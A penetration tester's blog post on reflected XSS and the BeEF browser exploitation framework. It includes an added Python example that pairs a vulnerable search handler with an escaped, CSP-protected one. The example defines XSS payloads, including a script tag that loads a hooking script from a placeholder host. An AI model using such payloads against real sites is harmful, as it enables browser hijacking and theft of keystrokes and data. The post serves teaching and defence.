THAT LITTLE BOX IS NOT FUNNY ANYMORE!
As penetration testers, I reckon we find at least one cross-site scripting (XSS) vulnerability, mostly reflected, in 85-90% of web application audits. There used to be a time when you would show the customer that little pop-up box echoing “123”, tell them “you have an XSS vulnerability in your application”, and watch them smile and throw a funny question back at you: “now what is that little box going to do to me?”
Gone are the days when you had a tough time explaining what exactly an XSS vulnerability can do to an application. With the arrival of the powerful tool called BeEF (Browser Exploitation Framework), it has become a lot easier to demonstrate the attack and thus convey to the customer how critical an XSS vulnerability is and the damage it can do.
BeEF is a powerful framework originally developed by Wade Alcorn; it integrates a wide range of client-side attack vectors and payloads that target the inherent weaknesses of browsers. It is an open-source project that has been gaining a lot of popularity since its release and has found its place in any pen-tester’s toolkit. Development has been steady, and new modules are being contributed to the framework by independent programmers, which keeps BeEF real spicy. Current modules include the first public inter-protocol exploit, a keystroke logger, clipboard theft, browser proxying, man-in-the-browser and many more.
Now we know how bad those little boxes can be!
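To make the “little box” concrete, here is an added example (not code from the original post or from the BeEF project) of the reflected XSS that produces it, side by side with a hardened version. The search handler, the `q` parameter, the CSP value and the `hook.example.invalid` URL are all assumptions constructed for the illustration.

```python
import html
from typing import Dict, Tuple
from urllib.parse import parse_qs, urlencode

# Constructed sample payloads: the "123" pop-up the customer laughs at, and a
# reflected <script src> that would pull a hooking script from another origin.
POPUP_PAYLOAD = '<script>alert("123")</script>'
HOOK_PAYLOAD = '<script src="https://hook.example.invalid/hook.js"></script>'


def request_for(payload: str) -> str:
    """Build the query string a tester would submit, e.g. q=%3Cscript%3E..."""
    return urlencode({"q": payload})


def vulnerable_search(query_string: str) -> str:
    """Reflects the 'q' parameter into the response verbatim: reflected XSS.
    Whatever was placed in the URL becomes markup in the victim's page."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for: {q}</h1>"


def hardened_search(query_string: str) -> Tuple[str, Dict[str, str]]:
    """Same feature with two layers of defence:
    1. HTML-entity encode the reflected value so it renders as text, not markup.
    2. Send a Content-Security-Policy allowing scripts from this origin only, so
       an injected <script src=...> from elsewhere is refused by the browser even
       if another page in the application forgets to encode."""
    q = parse_qs(query_string).get("q", [""])[0]
    body = f"<h1>Results for: {html.escape(q, quote=True)}</h1>"
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }
    return body, headers


def reflects_active_script(body: str) -> bool:
    """Minimal check a scanner or unit test can apply to a response body:
    did a raw <script tag survive reflection?"""
    return "<script" in body.lower()


if __name__ == "__main__":
    for payload in (POPUP_PAYLOAD, HOOK_PAYLOAD):
        req = request_for(payload)
        print("vulnerable:", vulnerable_search(req))
        body, headers = hardened_search(req)
        print("hardened:  ", body)
        print("CSP:       ", headers["Content-Security-Policy"])
```

The encoded response renders the payload as visible text, and the CSP gives the browser a second reason to refuse a script from any other origin.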
To read further on this, please check out the following references:
• 2011: Ground BeEF: Cutting, devouring and digesting the legs off a browser, Michele “antisnatchor” Orru (slides)
• 2012: I’m the butcher, do you want some BeEF, Michele “antisnatchor” Orru (slides)
• 2012: Shake Hooves With BeEF, Christian “xntrik” Frichot (slides)
• 2012: Hookin’ Ain’t Easy, BeEF Injection with MITM, Ryan Linn & Steve Ocepek (slides)
• 2012: Advances in BeEF, Michele “antisnatchor” Orru (slides)
• 2012: Exploiting internal network vulns via the browser using BeEF Bind, Michele “antisnatchor” Orru & Ty Miller (slides)
• 2012: All you ever wanted to know about BeEF, Michele “antisnatchor” Orru (slides)